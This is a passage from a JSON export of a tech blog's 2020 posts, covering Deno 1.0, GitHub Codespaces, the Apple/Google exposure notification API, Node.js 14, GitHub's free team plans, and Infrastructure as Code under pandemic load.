I\u0026rsquo;ve already had a situation where a URL changed and broke my build, which is exactly the kind of thing package-lock.json was designed to prevent.\nThe TypeScript compilation, while convenient, adds startup overhead. For long-running servers this is negligible, but for CLI tools and scripts, the cold-start time is noticeable compared to Node. Deno caches compiled output, so subsequent runs are fast, but the first run of a new script or after a code change involves compilation.\nAnd there\u0026rsquo;s the pragmatic question: who is Deno for? If you have existing Node applications in production, there\u0026rsquo;s no migration path. Deno isn\u0026rsquo;t Node-compatible — your Express routes, your Koa middleware, your thousands of lines of Node-specific code won\u0026rsquo;t just work. Deno is a from-scratch rewrite of your runtime, which means it\u0026rsquo;s only realistic for new projects.\nMy Take # I think Deno is an important project regardless of whether it achieves widespread adoption. It demonstrates that the ideas underpinning Node.js — which were revolutionary in 2009 — can be substantially improved upon. The security model, the TypeScript integration, the standard library approach, the single-binary distribution — these are all better than what Node offers, and they should push the Node ecosystem to improve.\nWill Deno replace Node? Not in the near term, and probably not ever in the way that Node replaced previous server-side JavaScript attempts. The npm ecosystem is too deep, the existing codebase too vast, the migration cost too high. But Deno doesn\u0026rsquo;t need to replace Node to be successful. If it captures even 10% of new server-side JavaScript projects, that\u0026rsquo;s a significant community.\nI\u0026rsquo;m going to keep using Deno for side projects, CLI tools, and prototypes. For production services that need a rich ecosystem of libraries and battle-tested frameworks, Node remains the practical choice. But I\u0026rsquo;m watching Deno\u0026rsquo;s ecosystem growth closely. If the standard library continues to mature and third-party modules reach a critical mass, the calculus could change. The broader pattern of runtime and platform iteration shows that the JavaScript ecosystem is rethinking its fundamentals.\nRyan Dahl got a rare second chance to apply lessons learned. Deno 1.0 shows he\u0026rsquo;s used it well. Now comes the harder part: convincing the world to care.\n","date":"14 May 2020","externalUrl":null,"permalink":"/posts/200514-deno-1-0-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Deno 1.0 launches with TypeScript support, a security-first permissions model, and a clean break from Node.js conventions — but can it find its niche?","title":"Deno 1.0 — Ryan Dahl's Do-Over for Server-Side JavaScript","type":"posts"},{"content":"Yesterday at GitHub Satellite — this year held as an online event for obvious reasons — the biggest announcement wasn\u0026rsquo;t another feature for Actions or an enhancement to code review. It was Codespaces: a full Visual Studio Code environment running in the cloud, accessible from your browser, integrated directly into GitHub repositories. Click a button, get a dev environment. It\u0026rsquo;s the kind of demo that makes you say \u0026ldquo;that\u0026rsquo;s cool\u0026rdquo; and then immediately start thinking about all the reasons it won\u0026rsquo;t work in practice. This comes as GitHub Actions continues to reshape CI/CD and the company consolidates developer tooling.\nBut I\u0026rsquo;ve been thinking about it for a day now, and I\u0026rsquo;m less dismissive than I expected to be.\nWhat Codespaces Actually Is # Codespaces is built on top of Visual Studio Online, which Microsoft launched last year. The underlying technology is a containerized VS Code server running on Azure, streamed to your browser (or to a local VS Code instance via a remote extension). Each codespace is a Linux container with configurable specs — you can choose your CPU, memory, and storage.\nThe GitHub integration is the interesting part. Repositories can include a .devcontainer folder with a devcontainer.json configuration file and an optional Dockerfile. This defines the development environment: which runtime versions to install, which VS Code extensions to pre-load, which ports to forward, which shell to use. When someone clicks \u0026ldquo;Open with Codespaces,\u0026rdquo; they get that exact environment, pre-configured, with the repository already cloned.\nThe demo showed someone opening a repository, making changes, running tests, and submitting a pull request — all from a browser tab. No local installation, no dependency management, no \u0026ldquo;it works on my machine\u0026rdquo; conversations. The time from clicking the button to having a working environment was about 30 seconds.\nWhy This Time Might Be Different # Cloud-based development environments have been attempted before. Cloud9 (now owned by AWS), Eclipse Che, Gitpod, Theia — the graveyard of almost-good-enough cloud IDEs stretches back years. I\u0026rsquo;ve tried most of them at one point or another, and they always hit the same wall: latency makes typing feel wrong, the environment is too constrained, or the configuration is too complex to justify the convenience.\nCodespaces has a few advantages that previous attempts lacked. First, it\u0026rsquo;s VS Code — the most popular editor among web developers by a significant margin. The extensions work, the keybindings work, the muscle memory transfers. This isn\u0026rsquo;t a web-based editor pretending to be an IDE; it\u0026rsquo;s the actual IDE, running remotely. GitHub\u0026rsquo;s ownership of VS Code positions it as the center of developer tooling integration.\nSecond, the .devcontainer specification means the environment configuration lives with the code. This is the same \u0026ldquo;infrastructure as code\u0026rdquo; principle that made Docker successful for deployment. When a new contributor opens the repository, they don\u0026rsquo;t need to read a README with seventeen steps for setting up their local environment. They don\u0026rsquo;t need the right version of Python, the right version of Node, the right native dependencies. The container handles all of it.\nThird, GitHub\u0026rsquo;s reach matters. If Codespaces is a first-class feature in the world\u0026rsquo;s largest code hosting platform, it gets adopted by default. Open source projects can provide contributor-ready environments. Companies can standardize development setups. The network effects are powerful.\nThe Problems That Remain # Let\u0026rsquo;s not get carried away. There are real constraints.\nLatency is still a factor. Even with a fast connection, there\u0026rsquo;s a perceptible delay when typing in a browser-based editor that doesn\u0026rsquo;t exist locally. It\u0026rsquo;s subtle — maybe 50-100ms — but for touch typists, it\u0026rsquo;s distracting. The VS Code remote extension (where you run VS Code locally but connect to a remote server) mitigates this significantly, but then you\u0026rsquo;re back to requiring a local installation.\nCost is unclear. The beta is free, but this will eventually be a paid service. If it\u0026rsquo;s priced per hour of compute time (like VS Code Online), the economics for full-time development are questionable. A developer working 8 hours a day on a 4-core, 8GB machine would likely spend more per month than buying a capable laptop. The sweet spot might be occasional use: onboarding, code reviews, quick fixes, open source contributions.\nOffline development is impossible. If your internet goes down, your development environment is gone. For those of us who occasionally code on trains, planes, or in locations with unreliable connectivity, this is a non-starter as a primary environment.\nAnd then there\u0026rsquo;s the elephant in the room: not everyone develops in VS Code. Vim users, Emacs devotees, JetBrains customers — Codespaces doesn\u0026rsquo;t speak to them. The .devcontainer spec is VS Code-specific, which limits its potential as a universal standard for development environments.\nThe Bigger Picture # What excites me about Codespaces isn\u0026rsquo;t the product itself — it\u0026rsquo;s the forcing function it creates. The .devcontainer specification is open, and it pushes the industry toward treating development environments as configuration rather than tribal knowledge.\nHow much time do teams waste on environment setup? In my experience, it\u0026rsquo;s measured in days per new hire and hours per week for ongoing maintenance. \u0026ldquo;Works on my machine\u0026rdquo; is a meme because it\u0026rsquo;s universally true. Docker addressed part of this for runtime environments, but the development environment — the IDE configuration, the linters, the debugger setup, the test runner integration — has remained stubbornly manual.\nIf .devcontainer becomes a standard that every repository includes, even developers who never use Codespaces benefit. You\u0026rsquo;d have a machine-readable specification of what the development environment should look like, which local tools could consume just as well as cloud tools.\nMy Take # I won\u0026rsquo;t be switching to Codespaces as my primary development environment. I have a well-tuned local setup that I\u0026rsquo;ve refined over decades, and I\u0026rsquo;m not ready to introduce a hard dependency on internet connectivity for my core workflow.\nBut I\u0026rsquo;m genuinely excited about what this means for a few specific use cases. Contributing to open source projects you\u0026rsquo;ve never worked on before? Enormous improvement. Onboarding new team members? Transformative. Running a workshop or training session? No more \u0026ldquo;let\u0026rsquo;s spend the first hour making sure everyone\u0026rsquo;s environment works.\u0026rdquo;\nThe real question is whether this is the beginning of a fundamental shift or a niche convenience. My gut says it\u0026rsquo;s somewhere in between — cloud development won\u0026rsquo;t replace local development for serious daily work, but it will become a standard supplement. Like many tools, its value lies not in replacing what works, but in eliminating what\u0026rsquo;s painful.\nI\u0026rsquo;ve signed up for the beta. I\u0026rsquo;ll report back once I\u0026rsquo;ve put it through its paces on a real project.\n","date":"7 May 2020","externalUrl":null,"permalink":"/posts/200507-github-codespaces-cloud-development/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub Satellite 2020 introduces Codespaces, a cloud-based development environment that could change how we think about local toolchains.","title":"GitHub Codespaces — Is Cloud Development Finally Ready?","type":"posts"},{"content":"In any other year, Apple and Google collaborating on a shared API would be the biggest tech story of the decade. In 2020, it\u0026rsquo;s just another Wednesday. The two companies have jointly developed an Exposure Notification system — originally called \u0026ldquo;Contact Tracing\u0026rdquo; before a deliberate rename — that uses Bluetooth Low Energy to help public health authorities track potential COVID-19 exposure. The technical architecture they\u0026rsquo;ve chosen is genuinely interesting, and it has implications well beyond pandemic response. This is part of the broader tech community\u0026rsquo;s mobilization around pandemic response that we\u0026rsquo;re seeing globally.\nHow It Actually Works # The system operates in two phases. Phase one, available now as an API for public health authority apps, works like this: your phone periodically broadcasts a rotating Bluetooth identifier — a random key derived from a daily Temporary Exposure Key (TEK). Other phones in proximity record these identifiers along with signal strength and duration.\nIf you test positive for COVID-19, you can choose to upload your TEKs to a central server. Every phone periodically downloads the published TEKs and checks them against its local log of observed identifiers. If there\u0026rsquo;s a match that meets certain risk parameters (close enough, long enough), the user gets a notification.\nThe critical design decision is what stays local and what goes to the server. Your phone\u0026rsquo;s Bluetooth observations — where you\u0026rsquo;ve been, who you\u0026rsquo;ve been near — never leave the device. The only data uploaded are the TEKs of confirmed positive cases, and these are effectively random numbers that reveal nothing about the person\u0026rsquo;s identity or location. The matching happens entirely on-device.\nThis is a fundamentally different architecture from the centralized approaches being pushed by some governments. France\u0026rsquo;s StopCovid app, for instance, uses a centralized model where all contact events are uploaded to a government server. The UK initially went centralized too. The decentralized approach that Apple and Google have chosen — often called the DP-3T model, after the academic protocol it\u0026rsquo;s based on — keeps the sensitive data distributed.\nThe Bluetooth Problem # As someone who\u0026rsquo;s spent considerable time working with IoT devices and Bluetooth protocols, I have a healthy skepticism about BLE-based proximity detection. Bluetooth signal strength (RSSI) is a notoriously unreliable proxy for physical distance. Walls, pockets, bags, body orientation, phone model, case material — all of these affect signal propagation in ways that make precise distance estimation essentially impossible.\nApple and Google are using a combination of signal attenuation, duration thresholds, and configurable risk scoring to try to separate meaningful contacts from noise. The API exposes parameters that public health authorities can tune: minimum duration, signal strength thresholds, risk weighting based on days since exposure. But fundamentally, you\u0026rsquo;re trying to answer an epidemiological question with a physical-layer signal that wasn\u0026rsquo;t designed for it.\nThe counter-argument is that perfect accuracy isn\u0026rsquo;t required. If the system catches 60-70% of genuine close contacts with an acceptable false positive rate, it\u0026rsquo;s still more effective than relying on human memory alone. Traditional contact tracing asks \u0026ldquo;who were you near in the last two weeks?\u0026rdquo; — a question most people can\u0026rsquo;t answer accurately even under ideal conditions. An automated system with imperfect accuracy may well outperform an interview-based system with imperfect recall.\nThe Privacy Architecture # What impresses me most about this project is how thoroughly privacy has been baked into the architecture. This isn\u0026rsquo;t privacy as an afterthought or a policy promise — it\u0026rsquo;s privacy as a technical constraint.\nThe Temporary Exposure Keys rotate daily. The Bluetooth identifiers derived from them rotate every 10-20 minutes. There\u0026rsquo;s no persistent identifier that could be used to track a device across time. The server never learns who was exposed — only the device knows, and the notification happens locally. Even the TEKs uploaded by positive cases are stripped of metadata; the server doesn\u0026rsquo;t know which TEKs belong to the same person across days.\nApple and Google have also made explicit commitments about the lifecycle: the system will be disabled region by region when it\u0026rsquo;s no longer needed, and the Bluetooth broadcasting can be turned off by the user at any time. Whether you trust those commitments is a separate question, but the technical architecture genuinely limits what any party — including Apple and Google themselves — can extract from the system.\nThis matters because the failure mode of privacy-invasive contact tracing is severe. If people don\u0026rsquo;t trust the system, they won\u0026rsquo;t install the app, and a contact tracing app with 10% adoption is approximately useless. The privacy-preserving design isn\u0026rsquo;t just ethically right — it\u0026rsquo;s pragmatically necessary.\nThe Platform Power Question # There\u0026rsquo;s a less comfortable aspect to this story. Apple and Google control the two mobile operating systems that cover effectively 100% of the smartphone market. By building this at the OS level, they\u0026rsquo;ve made a unilateral decision about how contact tracing should work on mobile devices. Governments that wanted centralized approaches are now facing the reality that their apps will work poorly without OS-level access to Bluetooth — access that Apple in particular has historically restricted for battery and privacy reasons.\nThis is an extraordinary exercise of platform power. It\u0026rsquo;s being used in this case for a purpose most people would consider legitimate, and the privacy-preserving design is arguably better than what most governments would have built on their own. But it sets a precedent. Two companies have effectively overridden national public health technology strategies because they control the platforms. The concentration of power in a few technology companies is increasingly relevant to how critical infrastructure gets built.\nMy Take # I\u0026rsquo;m cautiously optimistic about the Exposure Notification API. The privacy architecture is sound — I\u0026rsquo;ve read the cryptographic specification, and it\u0026rsquo;s well-designed. The Bluetooth accuracy concerns are real but probably acceptable for a supplementary tool. And the decentralized approach is clearly the right call from both an ethical and adoption standpoint. The broader theme of privacy-preserving architecture and open governance will define these critical systems for years to come.\nWhat concerns me is the adoption question. For this to work, a substantial percentage of the population needs to install and use a compatible app. The studies I\u0026rsquo;ve seen suggest you need 60%+ adoption for meaningful impact, though lower adoption rates can still provide some benefit. In my experience with IoT deployments, getting people to consistently use Bluetooth-based features is harder than it sounds — between battery concerns, Bluetooth confusion, and general app fatigue.\nWe\u0026rsquo;re in uncharted territory — two platform rivals collaborating on critical public health infrastructure under immense time pressure. As engineers, all we can do is evaluate the architecture on its merits, push for transparency, and hope the implementation lives up to the specification.\n","date":"30 April 2020","externalUrl":null,"permalink":"/posts/200430-apple-google-exposure-notification-api/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Apple and Google collaborate on a Bluetooth-based exposure notification system that puts privacy-preserving architecture front and center.","title":"Apple and Google's Exposure Notification API — Privacy Engineering at Scale","type":"posts"},{"content":"Node.js 14 dropped on April 21st, right on schedule. As someone who\u0026rsquo;s been building with Node since the early days — back when we were still arguing about whether JavaScript on the server was a terrible idea — each major release is a chance to take stock of where the platform is heading. And Node 14 tells an interesting story: the platform is growing up, focusing less on flashy new syntax and more on the plumbing that makes production systems reliable.\nThe Headline Features # Let\u0026rsquo;s start with what\u0026rsquo;s new. The V8 engine bumps to version 8.1, which brings Optional Chaining (?.) and Nullish Coalescing (??) out of the flag zone and into stable territory. If you\u0026rsquo;ve been using TypeScript, you\u0026rsquo;ve had these for a while, but having them natively in Node without a compilation step is welcome. They\u0026rsquo;re the kind of small ergonomic improvements that reduce boilerplate without introducing complexity.\nMore interesting to me is the experimental support for WASI — the WebAssembly System Interface. This isn\u0026rsquo;t just \u0026ldquo;run WebAssembly in Node\u0026rdquo; (we\u0026rsquo;ve had that since Node 8 with the WebAssembly global). WASI is about giving WebAssembly modules a standardized way to interact with the operating system: reading files, accessing environment variables, working with clocks. It\u0026rsquo;s sandboxed by design, capability-based, and it points toward a future where you can run untrusted code with fine-grained permissions. The security-first approach mirrors Deno\u0026rsquo;s philosophy in runtime design.\nThe --experimental-wasi-unstable-preview1 flag doesn\u0026rsquo;t exactly roll off the tongue, and the API is explicitly unstable. But the direction is clear. Imagine being able to load a third-party computation module — written in Rust, C, or any language that compiles to Wasm — and run it in your Node process with confidence that it can only access the resources you explicitly grant. For plugin architectures, serverless runtimes, and edge computing, this is compelling.\nDiagnostics Get Serious # The feature I\u0026rsquo;m most excited about is the improvements to the diagnostics tooling. Node 14 introduces experimental Async Local Storage in the async_hooks module, which finally provides a clean way to propagate context across async boundaries without manually threading it through every function call.\nIf you\u0026rsquo;ve ever tried to implement request tracing in a Node.js HTTP server, you know the pain. You get a request, you want to tag every log line with the request ID, but your code calls into libraries that call into other libraries, all with async/await or callbacks, and suddenly your nice request context is lost. The common workarounds — using cls-hooked, monkey-patching, or explicitly passing context objects — range from fragile to ugly.\nAsyncLocalStorage is the platform\u0026rsquo;s answer. It\u0026rsquo;s conceptually similar to thread-local storage in languages with real threads. You create a store, run a function within it, and any async operations spawned from that function can access the store. It works across setTimeout, Promises, async/await, and even event emitters. This is genuinely useful infrastructure for anyone building production Node services.\nThe diagnostic reports feature, which was experimental since Node 12, has also been promoted to stable. These reports give you a JSON snapshot of the process state — JavaScript and native stacks, heap statistics, resource usage, loaded libraries — that you can trigger programmatically or on specific signals. Think of it as a lightweight alternative to full core dumps that\u0026rsquo;s actually practical to collect in production.\nThe module situation # The ECMAScript modules story continues its slow march toward stability. In Node 14, ESM support is no longer behind a flag — import/export syntax works out of the box (with the usual .mjs extension or \u0026quot;type\u0026quot;: \u0026quot;module\u0026quot; in package.json). But \u0026ldquo;unflagged\u0026rdquo; doesn\u0026rsquo;t mean \u0026ldquo;settled.\u0026rdquo; The dual CJS/ESM ecosystem remains messy.\nThe practical reality is that most of the npm ecosystem is still CommonJS. If you\u0026rsquo;re writing a library, you need to either ship dual CJS/ESM builds or accept that some consumers will have issues. The conditional exports feature in package.json (stable in Node 14) helps — you can specify different entry points for require() and import — but it adds complexity to package configuration that many library authors would rather not deal with.\nI\u0026rsquo;ve been gradually migrating some of my projects to ESM, and my honest assessment is: it\u0026rsquo;s fine for applications, it\u0026rsquo;s still painful for libraries. Give it another year. By the time Node 14 reaches end-of-life, I expect the tooling and ecosystem will have caught up. For now, if you\u0026rsquo;re starting a new application (not a library), ESM is worth considering. For libraries, keep shipping CJS with optional ESM wrappers.\nWhat\u0026rsquo;s Coming in October # Node 14 enters Active LTS in October 2020, replacing Node 12 as the recommended production version. This is the real milestone. Right now, Node 14 is in \u0026ldquo;Current\u0026rdquo; status, which means it\u0026rsquo;ll get new features until October, at which point it freezes for stability. If you\u0026rsquo;re on Node 12 in production, start testing against 14 now — you have six months to identify breaking changes and update dependencies.\nThe breaking changes are relatively mild this cycle. The major one is the removal of some deprecated crypto APIs and the switch to OpenSSL 1.1.1, which means TLS 1.3 support by default. There are also some changes to fs.promises and stream APIs that might bite you if you were relying on undocumented behavior.\nMy Take # Node.js 14 isn\u0026rsquo;t a release that makes you rewrite your applications. It\u0026rsquo;s a release that makes your existing applications easier to debug, easier to monitor, and slightly more pleasant to write. The WASI support is the most forward-looking feature, but it won\u0026rsquo;t be practical for production use for at least a year. Meanwhile, the npm consolidation ensures that the ecosystem infrastructure continues to evolve alongside the runtime.\nWhat I appreciate most about Node\u0026rsquo;s release cadence is the predictability. Every six months, a new major version. Every October, the even-numbered version goes LTS. You can plan for it. After thirty years of watching platforms come and go, I\u0026rsquo;ve learned that boring and predictable beats exciting and unpredictable every single time.\nIf you\u0026rsquo;re running Node in production, start your Node 14 compatibility testing now. Update your CI matrices, run your test suites, check your native addons. October will be here faster than you think, and you don\u0026rsquo;t want to be scrambling to upgrade when 12 starts winding down.\n","date":"23 April 2020","externalUrl":null,"permalink":"/posts/200423-nodejs-14-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Node.js 14 launches with experimental WebAssembly System Interface support, improved diagnostics, and a clear path to long-term support in October.","title":"Node.js 14 Arrives — Diagnostics, WASI, and the Road to LTS","type":"posts"},{"content":"Two days ago, GitHub made an announcement that would have been unthinkable just a few years back: all of GitHub\u0026rsquo;s core features are now free for everyone, including teams. Unlimited private repositories with unlimited collaborators. No paywall. Let that sink in for a moment. This move accelerated GitHub\u0026rsquo;s platform consolidation by removing price as a barrier to adoption.\nIf you\u0026rsquo;d told me in 2015 that Microsoft would buy GitHub and then proceed to make it more open and accessible, I\u0026rsquo;d have questioned your judgement. Yet here we are, and this move feels like a genuine inflection point for how we think about developer tooling and collaboration.\nWhat Actually Changed # The details matter here. GitHub Free now includes unlimited private repositories with unlimited collaborators — something that previously required a paid Team plan. The new GitHub Free for organizations also bundles in 2,000 Actions minutes per month and 500MB of GitHub Packages storage. For many small teams and startups, this eliminates the single biggest reason to look elsewhere.\nThe paid Team plan itself dropped from $9/user/month to $4/user/month, adding features like code owners, required reviewers, and draft pull requests. Enterprise features remain separate, naturally — GitHub still needs revenue. But the core collaboration workflow? That\u0026rsquo;s now free.\nThis is significant because it removes friction at exactly the point where developers make tooling decisions. When you\u0026rsquo;re starting a side project with a few friends, or bootstrapping a startup, or running an open source project that needs some private CI infrastructure — you no longer hit that awkward moment where someone has to pull out a credit card.\nThe Strategic Play # Let\u0026rsquo;s be honest about what\u0026rsquo;s happening here. GitHub has 56 million developers on the platform. Microsoft\u0026rsquo;s play isn\u0026rsquo;t about charging $4/user/month for private repos — it\u0026rsquo;s about making GitHub the default collaboration layer for every developer on the planet, then building enterprise services on top of that foundation. Actions, Codespaces, and Packages represent this broader platform strategy beyond just code hosting.\nActions, Packages, Codespaces (still in beta), the security advisory database, the dependency graph — these are the revenue drivers. The basic Git hosting and collaboration? That\u0026rsquo;s the moat. By removing the last friction point for teams, GitHub is effectively saying: \u0026ldquo;We don\u0026rsquo;t want anyone to have a reason not to be here.\u0026rdquo;\nFrom a competitive standpoint, this puts serious pressure on GitLab and Bitbucket. GitLab has been winning deals with teams who couldn\u0026rsquo;t justify GitHub\u0026rsquo;s per-seat pricing, especially in the CI/CD space where GitLab\u0026rsquo;s integrated pipelines were compelling enough to offset the less polished UI. Now that calculus changes. GitHub Actions is maturing rapidly, and with free private repos, the \u0026ldquo;GitLab is cheaper\u0026rdquo; argument largely evaporates.\nWhat This Means for the Ecosystem # I\u0026rsquo;ve been running a mix of GitHub and self-hosted Gitea instances for various projects. The self-hosted approach made sense when private repos on GitHub meant paying per seat — especially for IoT projects where I wanted to keep firmware code private but didn\u0026rsquo;t want to justify the cost for a two-person side project.\nWith this change, I\u0026rsquo;m genuinely reconsidering that setup. Self-hosting a Git server isn\u0026rsquo;t hard, but it\u0026rsquo;s one more thing to maintain, one more thing to back up, one more thing to keep patched. If GitHub offers equivalent functionality for free, the operational overhead of self-hosting becomes harder to justify unless you have specific compliance or data sovereignty requirements.\nFor the broader open source community, this is almost entirely positive. Projects that maintained awkward split workflows — public repos for code, private repos elsewhere for CI configs or deployment scripts — can consolidate. Teams that were using GitHub for open source but Bitbucket for private work can simplify their toolchain. This consolidation mirrors the trend seen with npm\u0026rsquo;s acquisition and broader developer platform integration.\nThe 2,000 Actions minutes per month is particularly interesting. That\u0026rsquo;s enough for a reasonable CI/CD pipeline for a small project. Not enough for heavy integration testing or nightly builds across multiple platforms, but enough to get started without any cost. Combined with the existing free tier for public repos (which already had unlimited Actions minutes), this makes GitHub a genuinely complete platform for small-to-medium projects.\nMy Take # I\u0026rsquo;ve been in this industry long enough to remember when free services from large companies felt like traps. And maybe there\u0026rsquo;s an element of that here — once your entire workflow is on GitHub, the switching costs are enormous, and Microsoft knows it. But I also think there\u0026rsquo;s a more pragmatic reading: developer tools are becoming infrastructure, and the economics of infrastructure favor scale and low margins on the base layer.\nGitHub making core features free is good for developers. Full stop. The question isn\u0026rsquo;t whether to be grateful — it\u0026rsquo;s whether to be cautious. I\u0026rsquo;d still recommend that teams maintain the ability to export their repos and CI configurations. Don\u0026rsquo;t build workflows that are impossible to migrate. Use standard tooling where you can.\nBut for right now? If you\u0026rsquo;re a small team weighing GitHub against alternatives, the math just got a lot simpler. The platform is strong, the ecosystem is deep, and the price is right. Sometimes the boring, obvious choice is also the correct one.\nThe timing during a global pandemic — when countless developers are working from home and collaboration tooling matters more than ever — feels deliberate. Smart move, GitHub.\n","date":"16 April 2020","externalUrl":null,"permalink":"/posts/200416-github-free-for-teams/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub drops pricing barriers for teams, making unlimited private repos and essential collaboration features free for everyone.","title":"GitHub Free for Teams — What This Means for Open Source and Beyond","type":"posts"},{"content":"A month into the global lockdown, and infrastructure teams everywhere are running on caffeine and Terraform plans. The shift to remote work didn\u0026rsquo;t just increase traffic — it fundamentally changed traffic patterns. VPN concentrators that handled 10% of the workforce are now handling 100%. Video conferencing backends that provisioned for peak meeting hours are seeing all-day sustained load. And the teams managing all of this are doing it from their kitchen tables.\nI\u0026rsquo;ve been talking to infrastructure engineers across several companies this week, and a clear pattern is emerging: organizations that invested in Infrastructure as Code (IaC) practices are weathering this storm dramatically better than those still managing infrastructure manually. It\u0026rsquo;s not even close.\nThe Scaling Stories # Let me share a few anonymized examples of what I\u0026rsquo;m hearing:\nCompany A (financial services, ~5,000 employees) had their VPN infrastructure defined in Terraform with auto-scaling groups. When remote work mandates hit, they modified a few variables — instance count, instance type — ran terraform plan, reviewed the diff, and terraform apply. New VPN capacity was live in under an hour. Total downtime: zero.\nCompany B (similar size, similar industry) managed their VPN infrastructure through a combination of manual provisioning and shell scripts accumulated over five years. Scaling up required someone to log into the AWS console, manually launch instances, configure them by hand, update load balancer targets, and modify security groups. It took three days and two misconfigurations that caused outages.\nThe difference isn\u0026rsquo;t talent. Company B has excellent engineers. The difference is that Company A had codified their infrastructure decisions into version-controlled, reviewable, repeatable artifacts. When the crisis hit, they could adapt quickly because changing infrastructure meant changing code, not performing a sequence of manual steps from memory.\nTerraform, CloudFormation, and the State Problem # Terraform has emerged as the de facto standard for multi-cloud IaC, and its usage has reportedly spiked in the past month. HashiCorp\u0026rsquo;s Terraform Cloud saw a significant increase in runs as teams scrambled to scale. Years later, OpenTofu would emerge as an open-source alternative to Terraform, providing additional choice in the infrastructure-as-code landscape.\nBut Terraform\u0026rsquo;s state management — always its Achilles\u0026rsquo; heel — is causing pain at scale. Teams that were casually sharing state files in S3 buckets without proper locking are experiencing state corruption during concurrent modifications. When three engineers all need to scale different parts of the infrastructure simultaneously, state locking isn\u0026rsquo;t optional anymore.\nI\u0026rsquo;ve been recommending Terraform Cloud or at minimum a properly configured S3 backend with DynamoDB locking to every team I talk to. The free tier of Terraform Cloud handles remote state management well enough for most teams. But honestly, this should have been set up before the crisis, not during it.\nCloudFormation users, meanwhile, are dealing with their own challenges. AWS service limits — which many teams never thought about because they never approached them — are suddenly relevant. EC2 instance limits, EIP limits, NAT Gateway limits per AZ — all of these require support tickets to increase, and AWS support response times have understandably slowed as every customer makes the same requests simultaneously.\nAnsible and Configuration Drift # Infrastructure provisioning is only half the story. Once the servers exist, they need to be configured. Ansible, which many teams use for configuration management, is proving its worth — but also exposing a common anti-pattern. The importance of treating infrastructure as code would become increasingly critical as platforms matured and configuration drift became more costly.\nTeams that ran Ansible playbooks regularly (ideally on every commit to their config repo) are in good shape. Their configurations are consistent, their playbooks are tested, and scaling out means running the same playbook against new hosts. Teams that only ran Ansible during initial setup and then made manual changes to running systems are discovering the hard way what \u0026ldquo;configuration drift\u0026rdquo; means.\nI spoke with one SRE who described their situation bluntly: \u0026ldquo;We have Ansible playbooks, but they haven\u0026rsquo;t been run against production in eight months. Nobody trusts them anymore.\u0026rdquo; They\u0026rsquo;re essentially back to manual configuration, but with the added confusion of Ansible playbooks that may or may not reflect reality.\nThe lesson is one that the DevOps community has been preaching for years: IaC only works if it\u0026rsquo;s the only way you change infrastructure. The moment someone SSH\u0026rsquo;s in and makes a manual change, your code and your reality diverge.\nThe Monitoring Gap # Scaling infrastructure is one thing. Knowing whether it\u0026rsquo;s working is another. I\u0026rsquo;m seeing a lot of teams that scaled their application infrastructure but forgot to scale their monitoring. Prometheus instances running out of memory because they\u0026rsquo;re scraping three times as many targets. Elasticsearch clusters for log aggregation hitting storage limits. PagerDuty alert fatigue as thresholds calibrated for normal traffic fire constantly under pandemic loads.\nThe best-prepared teams had their monitoring infrastructure defined in the same IaC pipelines as their application infrastructure. Scale the app, the monitoring scales with it. But that level of maturity is still rare. Most organizations have a gap between their IaC practices for \u0026ldquo;the application\u0026rdquo; and \u0026ldquo;everything else.\u0026rdquo;\nGrafana dashboards, at least, have become a universal language. I\u0026rsquo;ve seen more screenshots of Grafana boards in Slack channels this month than in the previous year combined. If nothing else, this crisis is teaching everyone the value of observability.\nWhat We Should Learn # When this crisis eventually subsides (and it will), I hope infrastructure teams take three lessons forward:\nIaC is not optional. If your infrastructure can\u0026rsquo;t be reproduced from code, it can\u0026rsquo;t be scaled reliably under pressure. Full stop.\nPractice your scaling procedures. Chaos engineering — which sometimes feels like a luxury — is actually preparation for exactly this kind of scenario. If you\u0026rsquo;ve never tested scaling your VPN infrastructure by 10x, you don\u0026rsquo;t actually know if your Terraform configs support it.\nTreat monitoring and observability as first-class infrastructure. Your Prometheus, Grafana, and logging stack should be in the same Terraform modules as your application. If they\u0026rsquo;re not, they won\u0026rsquo;t scale when you need them to.\nMy Take # I\u0026rsquo;ve been advocating for Infrastructure as Code since long before it had a catchy name. We used to call it \u0026ldquo;scripting your environment\u0026rdquo; and it was considered a nice-to-have. The pandemic is proving what many of us always knew: it\u0026rsquo;s a necessity.\nThe good news is that the tooling has never been more mature. Terraform, Ansible, Pulumi, CloudFormation, CDK — there are excellent options for every use case and cloud provider. The barrier isn\u0026rsquo;t tooling; it\u0026rsquo;s organizational discipline.\nIf your team is currently in firefighting mode, manually scaling things to keep the lights on — that\u0026rsquo;s okay. Survive first. But once the immediate crisis passes, take what you learned about your infrastructure\u0026rsquo;s weaknesses and codify the fixes. Write the Terraform. Write the Ansible. Set up the state locking. Make sure the next crisis — and there will be a next one — finds you in Company A\u0026rsquo;s position, not Company B\u0026rsquo;s.\n","date":"9 April 2020","externalUrl":null,"permalink":"/posts/200409-infrastructure-as-code-pandemic-scaling/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The sudden shift to remote work has stress-tested Infrastructure as Code practices at unprecedented scale. Here’s what’s working, what’s breaking, and what we should learn.","title":"Infrastructure as Code Under Pressure — Lessons from Pandemic-Scale Scaling","type":"posts"},{"content":"Three weeks into lockdown, and my Twitter feed has transformed into an endless scroll of matplotlib charts and pandas DataFrames. Everyone, it seems, is a epidemiologist now — or at least an armchair data analyst. But beneath the noise of hastily-plotted exponential curves, there\u0026rsquo;s a genuine story about how Python\u0026rsquo;s data science ecosystem is being stress-tested in a way no one anticipated.\nThe COVID-19 pandemic has become the largest real-world deployment of Python-based data analysis in history. Governments, universities, and research labs are all reaching for the same stack: Python, Jupyter, pandas, NumPy, scikit-learn, and increasingly, PyTorch and TensorFlow for more sophisticated modeling. Having worked with Python since the 1.x days, watching it become the lingua franca of crisis response is both impressive and slightly terrifying.\nThe Jupyter Notebook Explosion # Jupyter notebooks have become the medium of choice for sharing COVID-19 analysis. The reasons are obvious — they combine code, visualizations, and narrative in a single document that both technical and non-technical stakeholders can follow. Researchers at Imperial College London, the University of Washington\u0026rsquo;s IHME, and dozens of other institutions are publishing their models as notebooks.\nThe COVID-19 Open Research Dataset (CORD-19), which I mentioned a few weeks ago, now contains over 44,000 scholarly articles. The Allen Institute for AI, Microsoft, and the National Library of Medicine assembled it specifically to enable computational analysis. Kaggle is hosting challenges to 